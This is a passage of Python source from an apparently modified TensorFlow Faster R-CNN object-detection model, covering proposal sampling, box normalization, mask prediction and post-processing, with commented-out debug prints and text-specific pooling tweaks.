# proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [], message=("original size= " + str(proposal_boxes_normalized.shape[1])))
# normalize proposal boxes
def normalize_boxes(args):
proposal_boxes_per_image = args[0]
image_shape = args[1]
normalized_boxes_per_image = box_list_ops.to_normalized_coordinates(
box_list.BoxList(proposal_boxes_per_image), image_shape[0],
image_shape[1], check_range=False).get()
return normalized_boxes_per_image
def to_absolute_boxes(args):
proposal_boxes_per_image = args[0]
image_shape = args[1]
normalized_boxes_per_image = box_list_ops.to_absolute_coordinates(
box_list.BoxList(proposal_boxes_per_image), image_shape[0],
image_shape[1], check_range=False).get()
return normalized_boxes_per_image
proposal_boxes = tf.constant(self.proposals, dtype='float32')
proposal_boxes = shape_utils.static_or_dynamic_map_fn(
to_absolute_boxes, elems=[proposal_boxes, true_image_shapes], dtype=tf.float32)
num_proposals = tf.constant([proposal_boxes.shape[1]], dtype='int32')
# single_image_boxlist = box_list.BoxList(proposals_absolute)
# proposal_boxes = self._sample_box_classifier_minibatch_single_image(single_image_boxlist, num_proposals, groundtruth_boxlists[0],
# groundtruth_classes_with_background_list[0], groundtruth_weights_list[0]).get()
# Minibatch sampling during training
if self._is_training:
proposal_boxes = tf.stop_gradient(proposal_boxes)
if not self._hard_example_miner:
placeholder_scores = tf.zeros((1, proposal_boxes.shape[1], 2))
#proposal_boxes = tf.Print(proposal_boxes, [proposal_boxes], message="1: ")
(groundtruth_boxlists, groundtruth_classes_with_background_list, _,
groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
(proposal_boxes, _, num_proposals) = self._sample_box_classifier_batch(proposal_boxes, placeholder_scores, num_proposals,
groundtruth_boxlists, groundtruth_classes_with_background_list, groundtruth_weights_list, true_image_shapes[0])
#proposal_boxes = tf.Print(proposal_boxes, [proposal_boxes], message="2: ")
#proposal_boxes = tf.Print(proposal_boxes, [], message=("Shape of pboxes " + str(proposal_boxes.shape[1])))
#num_proposals = tf.Print(num_proposals, [num_proposals])
proposal_boxes_normalized = shape_utils.static_or_dynamic_map_fn(
normalize_boxes, elems=[proposal_boxes, true_image_shapes], dtype=tf.float32)
#proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [proposal_boxes_normalized], message="3: ")
#proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [tf.shape(proposal_boxes_normalized)], message=("Shape of pboxes "))
#proposal_boxes_normalized = tf.constant(self.proposals[:, 0:64, :], dtype='float32')
#proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [], message=("Shape of minibatch " + str(proposal_boxes_normalized.shape[1])))
flattened_proposal_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, proposal_boxes_normalized))
#flattened_proposal_feature_maps = tf.stop_gradient(flattened_proposal_feature_maps)
#flattened_proposal_feature_maps = tf.Print(flattened_proposal_feature_maps, [], message=("Cropped props : " + str(flattened_proposal_feature_maps.shape)))
box_classifier_features = (
self._feature_extractor.extract_box_classifier_features(
flattened_proposal_feature_maps,
scope=self.second_stage_feature_extractor_scope))
if self._mask_rcnn_box_predictor.is_keras_model:
box_predictions = self._mask_rcnn_box_predictor(
[box_classifier_features],
prediction_stage=2)
else:
box_predictions = self._mask_rcnn_box_predictor.predict(
[box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=2)
refined_box_encodings = tf.squeeze(
box_predictions[box_predictor.BOX_ENCODINGS],
axis=1, name='all_refined_box_encodings')
class_predictions_with_background = tf.squeeze(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1, name='all_class_predictions_with_background')
absolute_proposal_boxes = ops.normalized_to_image_coordinates(
proposal_boxes_normalized, image_shape, self._parallel_iterations)
prediction_dict = {
'refined_box_encodings': refined_box_encodings,
'class_predictions_with_background':
class_predictions_with_background,
'num_proposals': num_proposals,
'proposal_boxes': absolute_proposal_boxes,
'box_classifier_features': box_classifier_features,
'proposal_boxes_normalized': proposal_boxes_normalized,
}
return prediction_dict
def _predict_third_stage(self, prediction_dict, image_shapes):
"""Predicts non-box, non-class outputs using refined detections.
For training, masks as predicted directly on the box_classifier_features,
which are region-features from the initial anchor boxes.
For inference, this happens after calling the post-processing stage, such
that masks are only calculated for the top scored boxes.
Args:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) box_classifier_features: a 4-D float32 tensor representing the
features for each proposal.
image_shapes: A 2-D int32 tensors of shape [batch_size, 3] containing
shapes of images in the batch.
Returns:
prediction_dict: a dictionary that in addition to the input predictions
does hold the following predictions as well:
1) mask_predictions: a 4-D tensor with shape
[batch_size, max_detection, mask_height, mask_width] containing
instance mask predictions.
"""
if self._is_training:
curr_box_classifier_features = prediction_dict['box_classifier_features']
detection_classes = prediction_dict['class_predictions_with_background']
if self._mask_rcnn_box_predictor.is_keras_model:
mask_predictions = self._mask_rcnn_box_predictor(
[curr_box_classifier_features],
prediction_stage=3)
else:
mask_predictions = self._mask_rcnn_box_predictor.predict(
[curr_box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=3)
prediction_dict['mask_predictions'] = tf.squeeze(mask_predictions[
box_predictor.MASK_PREDICTIONS], axis=1)
else:
detections_dict = self._postprocess_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
image_shapes)
prediction_dict.update(detections_dict)
detection_boxes = detections_dict[
fields.DetectionResultFields.detection_boxes]
detection_classes = detections_dict[
fields.DetectionResultFields.detection_classes]
rpn_features_to_crop = prediction_dict['rpn_features_to_crop']
batch_size = tf.shape(detection_boxes)[0]
max_detection = tf.shape(detection_boxes)[1]
flattened_detected_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, detection_boxes))
curr_box_classifier_features = (
self._feature_extractor.extract_box_classifier_features(
flattened_detected_feature_maps,
scope=self.second_stage_feature_extractor_scope))
if self._mask_rcnn_box_predictor.is_keras_model:
mask_predictions = self._mask_rcnn_box_predictor(
[curr_box_classifier_features],
prediction_stage=3)
else:
mask_predictions = self._mask_rcnn_box_predictor.predict(
[curr_box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=3)
detection_masks = tf.squeeze(mask_predictions[
box_predictor.MASK_PREDICTIONS], axis=1)
_, num_classes, mask_height, mask_width = (
detection_masks.get_shape().as_list())
_, max_detection = detection_classes.get_shape().as_list()
if num_classes > 1:
detection_masks = self._gather_instance_masks(
detection_masks, detection_classes)
prediction_dict[fields.DetectionResultFields.detection_masks] = (
tf.reshape(detection_masks,
[batch_size, max_detection, mask_height, mask_width]))
return prediction_dict
def _gather_instance_masks(self, instance_masks, classes):
"""Gathers the masks that correspond to classes.
Args:
instance_masks: A 4-D float32 tensor with shape
[K, num_classes, mask_height, mask_width].
classes: A 2-D int32 tensor with shape [batch_size, max_detection].
Returns:
masks: a 3-D float32 tensor with shape [K, mask_height, mask_width].
"""
_, num_classes, height, width = instance_masks.get_shape().as_list()
k = tf.shape(instance_masks)[0]
instance_masks = tf.reshape(instance_masks, [-1, height, width])
classes = tf.to_int32(tf.reshape(classes, [-1]))
gather_idx = tf.range(k) * num_classes + classes
return tf.gather(instance_masks, gather_idx)
def _extract_rpn_feature_maps(self, preprocessed_inputs):
"""Extracts RPN features.
This function extracts two feature maps: a feature map to be directly
fed to a box predictor (to predict location and objectness scores for
proposals) and a feature map from which to crop regions which will then
be sent to the second stage box classifier.
Args:
preprocessed_inputs: a [batch, height, width, channels] image tensor.
Returns:
rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch, height, width, depth] to be used for predicting proposal boxes
and corresponding objectness scores.
rpn_features_to_crop: A 4-D float32 tensor with shape
[batch, height, width, depth] representing image features to crop using
the proposals boxes.
anchors: A BoxList representing anchors (for the RPN) in
absolute coordinates.
image_shape: A 1-D tensor representing the input image shape.
"""
image_shape = tf.shape(preprocessed_inputs)
rpn_features_to_crop, _ = self._feature_extractor.extract_proposal_features(
preprocessed_inputs, scope=self.first_stage_feature_extractor_scope)
feature_map_shape = tf.shape(rpn_features_to_crop)
anchors = box_list_ops.concatenate(
self._first_stage_anchor_generator.generate([(feature_map_shape[1],
feature_map_shape[2])]))
with slim.arg_scope(self._first_stage_box_predictor_arg_scope_fn()):
kernel_size = self._first_stage_box_predictor_kernel_size
rpn_box_predictor_features = slim.conv2d(
rpn_features_to_crop,
self._first_stage_box_predictor_depth,
kernel_size=[kernel_size, kernel_size],
rate=self._first_stage_atrous_rate,
activation_fn=tf.nn.relu6)
return (rpn_box_predictor_features, rpn_features_to_crop,
anchors, image_shape)
def _predict_rpn_proposals(self, rpn_box_predictor_features):
"""Adds box predictors to RPN feature map to predict proposals.
Note resulting tensors will not have been postprocessed.
Args:
rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch, height, width, depth] to be used for predicting proposal boxes
and corresponding objectness scores.
Returns:
box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
Raises:
RuntimeError: if the anchor generator generates anchors corresponding to
multiple feature maps. We currently assume that a single feature map
is generated for the RPN.
"""
num_anchors_per_location = (
self._first_stage_anchor_generator.num_anchors_per_location())
if len(num_anchors_per_location) != 1:
raise RuntimeError('anchor_generator is expected to generate anchors '
'corresponding to a single feature map.')
if self._first_stage_box_predictor.is_keras_model:
box_predictions = self._first_stage_box_predictor(
[rpn_box_predictor_features])
else:
box_predictions = self._first_stage_box_predictor.predict(
[rpn_box_predictor_features],
num_anchors_per_location,
scope=self.first_stage_box_predictor_scope)
box_encodings = tf.concat(
box_predictions[box_predictor.BOX_ENCODINGS], axis=1)
objectness_predictions_with_background = tf.concat(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1)
return (tf.squeeze(box_encodings, axis=2),
objectness_predictions_with_background)
def _remove_invalid_anchors_and_predictions(
self,
box_encodings,
objectness_predictions_with_background,
anchors_boxlist,
clip_window):
"""Removes anchors that (partially) fall outside an image.
Also removes associated box encodings and objectness predictions.
Args:
box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
anchors_boxlist: A BoxList representing num_anchors anchors (for the RPN)
in absolute coordinates.
clip_window: a 1-D tensor representing the [ymin, xmin, ymax, xmax]
extent of the window to clip/prune to.
Returns:
box_encodings: 4-D float tensor of shape
[batch_size, num_valid_anchors, self._box_coder.code_size] containing
predicted boxes, where num_valid_anchors <= num_anchors
objectness_predictions_with_background: 2-D float tensor of shape
[batch_size, num_valid_anchors, 2] containing class
predictions (logits) for each of the anchors, where
num_valid_anchors <= num_anchors. Note that this
tensor *includes* background class predictions (at class index 0).
anchors: A BoxList representing num_valid_anchors anchors (for the RPN) in
absolute coordinates.
"""
pruned_anchors_boxlist, keep_indices = box_list_ops.prune_outside_window(
anchors_boxlist, clip_window)
def _batch_gather_kept_indices(predictions_tensor):
return shape_utils.static_or_dynamic_map_fn(
partial(tf.gather, indices=keep_indices),
elems=predictions_tensor,
dtype=tf.float32,
parallel_iterations=self._parallel_iterations,
back_prop=True)
return (_batch_gather_kept_indices(box_encodings),
_batch_gather_kept_indices(objectness_predictions_with_background),
pruned_anchors_boxlist)
def _flatten_first_two_dimensions(self, inputs):
"""Flattens `K-d` tensor along batch dimension to be a `(K-1)-d` tensor.
Converts `inputs` with shape [A, B, ..., depth] into a tensor of shape
[A * B, ..., depth].
Args:
inputs: A float tensor with shape [A, B, ..., depth]. Note that the first
two and last dimensions must be statically defined.
Returns:
A float tensor with shape [A * B, ..., depth] (where the first and last
dimension are statically defined.
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(inputs)
flattened_shape = tf.stack([combined_shape[0] * combined_shape[1]] +
combined_shape[2:])
return tf.reshape(inputs, flattened_shape)
def postprocess(self, prediction_dict, true_image_shapes):
"""Convert prediction tensors to final detections.
This function converts raw predictions tensors to final detection results.
See base class for output format conventions. Note also that by default,
scores are to be interpreted as logits, but if a score_converter is used,
then scores are remapped (and may thus have a different interpretation).
If number_of_stages=1, the returned results represent proposals from the
first stage RPN and are padded to have self.max_num_proposals for each
image; otherwise, the results can be interpreted as multiclass detections
from the full two-stage model and are padded to self._max_detections.
Args:
prediction_dict: a dictionary holding prediction tensors (see the
documentation for the predict method. If number_of_stages=1, we
expect prediction_dict to contain `rpn_box_encodings`,
`rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
and `anchors` fields. Otherwise we expect prediction_dict to
additionally contain `refined_box_encodings`,
`class_predictions_with_background`, `num_proposals`,
`proposal_boxes` and, optionally, `mask_predictions` fields.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
detections: a dictionary containing the following fields
detection_boxes: [batch, max_detection, 4]
detection_scores: [batch, max_detections]
detection_classes: [batch, max_detections]
(this entry is only created if rpn_mode=False)
num_detections: [batch]
Raises:
ValueError: If `predict` is called before `preprocess`.
"""
with tf.name_scope('FirstStagePostprocessor'):
if self._number_of_stages == 1:
# Michele's addition
proposal_boxes, proposal_scores, num_proposals = self._postprocess_rpn(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['anchors'],
true_image_shapes,
true_image_shapes)
return {
fields.DetectionResultFields.detection_boxes: proposal_boxes,
fields.DetectionResultFields.detection_scores: proposal_scores,
fields.DetectionResultFields.num_detections:
tf.to_float(num_proposals),
}
# TODO(jrru): Remove mask_predictions from _post_process_box_classifier.
with tf.name_scope('SecondStagePostprocessor'):
if (self._number_of_stages == 2 or
(self._number_of_stages == 3 and self._is_training)):
mask_predictions = prediction_dict.get(box_predictor.MASK_PREDICTIONS)
detections_dict = self._postprocess_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
true_image_shapes,
mask_predictions=mask_predictions)
return detections_dict
if self._number_of_stages == 3:
# Post processing is already performed in 3rd stage. We need to transfer
# postprocessed tensors from `prediction_dict` to `detections_dict`.
detections_dict = {}
for key in prediction_dict:
if key == fields.DetectionResultFields.detection_masks:
detections_dict[key] = tf.sigmoid(prediction_dict[key])
elif 'detection' in key:
detections_dict[key] = prediction_dict[key]
return detections_dict
def _postprocess_rpn(self,
rpn_box_encodings_batch,
rpn_objectness_predictions_with_background_batch,
anchors,
image_shapes,
true_image_shapes):
"""Converts first stage prediction tensors from the RPN to proposals.
This function decodes the raw RPN predictions, runs non-max suppression
on the result.
Note that the behavior of this function is slightly modified during
training --- specifically, we stop the gradient from passing through the
proposal boxes and we only return a balanced sampled subset of proposals
with size `second_stage_batch_size`.
Args:
rpn_box_encodings_batch: A 3-D float32 tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted proposal box encodings.
rpn_objectness_predictions_with_background_batch: A 3-D float tensor of
shape [batch_size, num_anchors, 2] containing objectness predictions
(logits) for each of the anchors with 0 corresponding to background
and 1 corresponding to object.
anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN. Note that `num_anchors` can differ depending
on whether the model is created in training or inference mode.
image_shapes: A 2-D tensor of shape [batch, 3] containing the shapes of
images in the batch.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
proposal_boxes: A float tensor with shape
[batch_size, max_num_proposals, 4] representing the (potentially zero
padded) proposal boxes for all images in the batch. These boxes are
represented as normalized coordinates.
proposal_scores: A float tensor with shape
[batch_size, max_num_proposals] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
"""
rpn_box_encodings_batch = tf.expand_dims(rpn_box_encodings_batch, axis=2)
rpn_encodings_shape = shape_utils.combined_static_and_dynamic_shape(
rpn_box_encodings_batch)
tiled_anchor_boxes = tf.tile(
tf.expand_dims(anchors, 0), [rpn_encodings_shape[0], 1, 1])
proposal_boxes = self._batch_decode_boxes(rpn_box_encodings_batch,
tiled_anchor_boxes)
proposal_boxes = tf.squeeze(proposal_boxes, axis=2)
rpn_objectness_softmax_without_background = tf.nn.softmax(
rpn_objectness_predictions_with_background_batch)[:, :, 1]
clip_window = self._compute_clip_window(image_shapes)
(proposal_boxes, proposal_scores, _, _, _,
num_proposals) = post_processing.batch_multiclass_non_max_suppression(
tf.expand_dims(proposal_boxes, axis=2),
tf.expand_dims(rpn_objectness_softmax_without_background,
axis=2),
self._first_stage_nms_score_threshold,
self._first_stage_nms_iou_threshold,
self._first_stage_max_proposals,
self._first_stage_max_proposals,
clip_window=clip_window)
if self._is_training:
proposal_boxes = tf.stop_gradient(proposal_boxes)
if not self._hard_example_miner:
(groundtruth_boxlists, groundtruth_classes_with_background_list, _,
groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
(proposal_boxes, proposal_scores,
num_proposals) = self._sample_box_classifier_batch(
proposal_boxes, proposal_scores, num_proposals,
groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_weights_list)
# normalize proposal boxes
def normalize_boxes(args):
proposal_boxes_per_image = args[0]
image_shape = args[1]
normalized_boxes_per_image = box_list_ops.to_normalized_coordinates(
box_list.BoxList(proposal_boxes_per_image), image_shape[0],
image_shape[1], check_range=False).get()
return normalized_boxes_per_image
normalized_proposal_boxes = shape_utils.static_or_dynamic_map_fn(
normalize_boxes, elems=[proposal_boxes, image_shapes], dtype=tf.float32)
return normalized_proposal_boxes, proposal_scores, num_proposals
def _sample_box_classifier_batch(
self,
proposal_boxes,
proposal_scores,
num_proposals,
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
debug=None):
"""Samples a minibatch for second stage.
Args:
proposal_boxes: A float tensor with shape
[batch_size, num_proposals, 4] representing the (potentially zero
padded) proposal boxes for all images in the batch. These boxes are
represented in absolute coordinates.
proposal_scores: A float tensor with shape
[batch_size, num_proposals] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
groundtruth_boxlists: A list of BoxLists containing (absolute) coordinates
of the groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_weights_list: A list of 1-D tensors of shape [num_boxes]
indicating the weight associated with the groundtruth boxes.
Returns:
proposal_boxes: A float tensor with shape
[batch_size, second_stage_batch_size, 4] representing the (potentially
zero padded) proposal boxes for all images in the batch. These boxes
are represented in absolute coordinates.
proposal_scores: A float tensor with shape
[batch_size, second_stage_batch_size] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
"""
single_image_proposal_box_sample = []
single_image_proposal_score_sample = []
single_image_num_proposals_sample = []
for (single_image_proposal_boxes,
single_image_proposal_scores,
single_image_num_proposals,
single_image_groundtruth_boxlist,
single_image_groundtruth_classes_with_background,
single_image_groundtruth_weights) in zip(
tf.unstack(proposal_boxes),
tf.unstack(proposal_scores),
tf.unstack(num_proposals),
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list):
single_image_boxlist = box_list.BoxList(single_image_proposal_boxes)
single_image_boxlist.add_field(fields.BoxListFields.scores,
single_image_proposal_scores)
sampled_boxlist = self._sample_box_classifier_minibatch_single_image(
single_image_boxlist,
single_image_num_proposals,
single_image_groundtruth_boxlist,
single_image_groundtruth_classes_with_background,
single_image_groundtruth_weights,
debug)
# sampled_boxlist.set(tf.Print(sampled_boxlist.get(), [sampled_boxlist.num_boxes()], message="sample size "))
sampled_padded_boxlist = box_list_ops.pad_or_clip_box_list(
sampled_boxlist,
num_boxes=self._second_stage_batch_size)
single_image_num_proposals_sample.append(tf.minimum(
sampled_boxlist.num_boxes(),
self._second_stage_batch_size))
bb = sampled_padded_boxlist.get()
#bb = tf.Print(bb, [single_image_groundtruth_boxlist.num_boxes()], message=("After padding and num of GT" + str(bb.shape)))
single_image_proposal_box_sample.append(bb)
single_image_proposal_score_sample.append(
sampled_padded_boxlist.get_field(fields.BoxListFields.scores))
return (tf.stack(single_image_proposal_box_sample),
tf.stack(single_image_proposal_score_sample),
tf.stack(single_image_num_proposals_sample))
def _format_groundtruth_data(self, true_image_shapes, stage='detection'):
"""Helper function for preparing groundtruth data for target assignment.
In order to be consistent with the model.DetectionModel interface,
groundtruth boxes are specified in normalized coordinates and classes are
specified as label indices with no assumed background category. To prepare
for target assignment, we:
1) convert boxes to absolute coordinates,
2) add a background class at class index 0
3) groundtruth instance masks, if available, are resized to match
image_shape.
Args:
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
groundtruth_boxlists: A list of BoxLists containing (absolute) coordinates
of the groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_masks_list: If present, a list of 3-D tf.float32 tensors of
shape [num_boxes, image_height, image_width] containing instance masks.
This is set to None if no masks exist in the provided groundtruth.
"""
groundtruth_boxlists = [
box_list_ops.to_absolute_coordinates(
box_list.BoxList(boxes), true_image_shapes[i, 0],
true_image_shapes[i, 1])
for i, boxes in enumerate(
self.groundtruth_lists(fields.BoxListFields.boxes))
]
groundtruth_classes_with_background_list = [
tf.to_float(
tf.pad(one_hot_encoding, [[0, 0], [1, 0]], mode='CONSTANT'))
for one_hot_encoding in self.groundtruth_lists(
fields.BoxListFields.classes)]
groundtruth_masks_list = self._groundtruth_lists.get(
fields.BoxListFields.masks)
if groundtruth_masks_list is not None:
resized_masks_list = []
for mask in groundtruth_masks_list:
_, resized_mask, _ = self._image_resizer_fn(
# Reuse the given `image_resizer_fn` to resize groundtruth masks.
# `mask` tensor for an image is of the shape [num_masks,
# image_height, image_width]. Below we create a dummy image of the
# the shape [image_height, image_width, 1] to use with
# `image_resizer_fn`.
image=tf.zeros(tf.stack([tf.shape(mask)[1], tf.shape(mask)[2], 1])),
masks=mask)
resized_masks_list.append(resized_mask)
groundtruth_masks_list = resized_masks_list
if self.groundtruth_has_field(fields.BoxListFields.weights):
groundtruth_weights_list = self.groundtruth_lists(
fields.BoxListFields.weights)
else:
# Set weights for all batch elements equally to 1.0
groundtruth_weights_list = []
for groundtruth_classes in groundtruth_classes_with_background_list:
num_gt = tf.shape(groundtruth_classes)[0]
groundtruth_weights = tf.ones(num_gt)
groundtruth_weights_list.append(groundtruth_weights)
return (groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_masks_list, groundtruth_weights_list)
def _sample_box_classifier_minibatch_single_image(
self, proposal_boxlist, num_valid_proposals, groundtruth_boxlist,
groundtruth_classes_with_background, groundtruth_weights, debug=None):
"""Samples a mini-batch of proposals to be sent to the box classifier.
Helper function for self._postprocess_rpn.
Args:
proposal_boxlist: A BoxList containing K proposal boxes in absolute
coordinates.
num_valid_proposals: Number of valid proposals in the proposal boxlist.
groundtruth_boxlist: A Boxlist containing N groundtruth object boxes in
absolute coordinates.
groundtruth_classes_with_background: A tensor with shape
`[N, self.num_classes + 1]` representing groundtruth classes. The
classes are assumed to be k-hot encoded, and include background as the
zero-th class.
groundtruth_weights: Weights attached to the groundtruth_boxes.
debug: contains (optional) true_image_shape
Returns:
a BoxList contained sampled proposals.
"""
(cls_targets, cls_weights, _, _, _) = self._detector_target_assigner.assign(
proposal_boxlist,
groundtruth_boxlist,
groundtruth_classes_with_background,
unmatched_class_label=tf.constant(
[1] + self._num_classes * [0], dtype=tf.float32),
groundtruth_weights=groundtruth_weights)
# Selects all boxes as candidates if none of them is selected according
# to cls_weights. This could happen as boxes within certain IOU ranges
# are ignored. If triggered, the selected boxes will still be ignored
# during loss computation.
positive_indicator = tf.greater(tf.argmax(cls_targets, axis=1), 0)
# Debug target mapping
#positive_indicator = tf.Print(positive_indicator, [positive_indicator, box_list_ops.to_normalized_coordinates(groundtruth_boxlist, debug[0], debug[1]).get()], summarize=999999)
valid_indicator = tf.logical_and(
tf.range(proposal_boxlist.num_boxes()) < num_valid_proposals,
cls_weights > 0
)
sampled_indices = self._second_stage_sampler.subsample(
valid_indicator,
self._second_stage_batch_size,
positive_indicator)
return box_list_ops.boolean_mask(proposal_boxlist, sampled_indices)
def _compute_second_stage_input_feature_maps(self, features_to_crop,
proposal_boxes_normalized):
"""Crops to a set of proposals from the feature map for a batch of images.
Helper function for self._postprocess_rpn. This function calls
`tf.image.crop_and_resize` to create the feature map to be passed to the
second stage box classifier for each proposal.
Args:
features_to_crop: A float32 tensor with shape
[batch_size, height, width, depth]
proposal_boxes_normalized: A float32 tensor with shape [batch_size,
num_proposals, box_code_size] containing proposal boxes in
normalized coordinates.
Returns:
A float32 tensor with shape [K, new_height, new_width, depth].
"""
def get_box_inds(proposals):
proposals_shape = proposals.get_shape().as_list()
if any(dim is None for dim in proposals_shape):
proposals_shape = tf.shape(proposals)
ones_mat = tf.ones(proposals_shape[:2], dtype=tf.int32)
multiplier = tf.expand_dims(
tf.range(start=0, limit=proposals_shape[0]), 1)
return tf.reshape(ones_mat * multiplier, [-1])
if self._use_matmul_crop_and_resize:
def _single_image_crop_and_resize(inputs):
single_image_features_to_crop, proposal_boxes_normalized = inputs
return ops.matmul_crop_and_resize(
tf.expand_dims(single_image_features_to_crop, 0),
proposal_boxes_normalized,
[self._initial_crop_size, self._initial_crop_size])
cropped_regions = self._flatten_first_two_dimensions(
shape_utils.static_or_dynamic_map_fn(
_single_image_crop_and_resize,
elems=[features_to_crop, proposal_boxes_normalized],
dtype=tf.float32,
parallel_iterations=self._parallel_iterations))
else:
cropped_regions = tf.image.crop_and_resize(
features_to_crop,
self._flatten_first_two_dimensions(proposal_boxes_normalized),
get_box_inds(proposal_boxes_normalized),
(self._initial_crop_size, self._initial_crop_size))
return slim.max_pool2d(
cropped_regions,
[self._maxpool_kernel_size, self._maxpool_kernel_size], # Michele: Being specific to text, we want to preserve width more than height
stride=[self._maxpool_stride, 1])
def _postprocess_box_classifier(self,
refined_box_encodings,
class_predictions_with_background,
proposal_boxes,
num_proposals,
image_shapes,
mask_predictions=None):
"""Converts predictions from the second stage box classifier to detections.
Args:
refined_box_encodings: a 3-D float tensor with shape
[total_num_padded_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings. If using a shared
box across classes the shape will instead be
[total_num_padded_proposals, 1, 4]
class_predictions_with_background: a 3-D tensor float with shape
[total_num_padded_proposals, num_classes + 1] containing class
predictions (logits) for each of the proposals. Note that this tensor
*includes* background class predictions (at class index 0).
proposal_boxes: a 3-D float tensor with shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in absolute coordinates.
num_proposals: a 1-D int32 tensor of shape [batch] representing the number
of proposals predicted for each image in the batch.
image_shapes: a 2-D int32 tensor containing shapes of input image in the
batch.
mask_predictions: (optional) a 4-D float tensor with shape
[total_num_padded_proposals, num_classes, mask_height, mask_width]
containing instance mask prediction logits.
Returns:
A dictionary containing:
`detection_boxes`: [batch, max_detection, 4]
`detection_scores`: [batch, max_detections]
`detection_classes`: [batch, max_detections]
`num_detections`: [batch]
`detection_masks`:
(optional) [batch, max_detections, mask_height, mask_width]. Note
that a pixel-wise sigmoid score converter is applied to the detection
masks.
"""
refined_box_encodings_batch = tf.reshape(
refined_box_encodings,
[-1,
self.max_num_proposals,
refined_box_encodings.shape[1],
self._box_coder.code_size])
class_predictions_with_background_batch = tf.reshape(
class_predictions_with_background,
[-1, self.max_num_proposals, self.num_classes + 1]
)
refined_decoded_boxes_batch = self._batch_decode_boxes(
refined_box_encodings_batch, proposal_boxes)
class_predictions_with_background_batch = (
self._second_stage_score_conversion_fn(
class_predictions_with_background_batch))
class_predictions_batch = tf.reshape(
tf.slice(class_predictions_with_background_batch,
[0, 0, 1], [-1, -1, -1]),
[-1, self.max_num_proposals, self.num_classes])
clip_window = self._compute_clip_window(image_shapes)
mask_predictions_batch = None
if mask_predictions is not None:
mask_height = mask_predictions.shape[2].value
mask_width = mask_predictions.shape[3].value
mask_predictions = tf.sigmoid(mask_predictions)
mask_predictions_batch = tf.reshape(
mask_predictions, [-1, self.max_num_proposals,
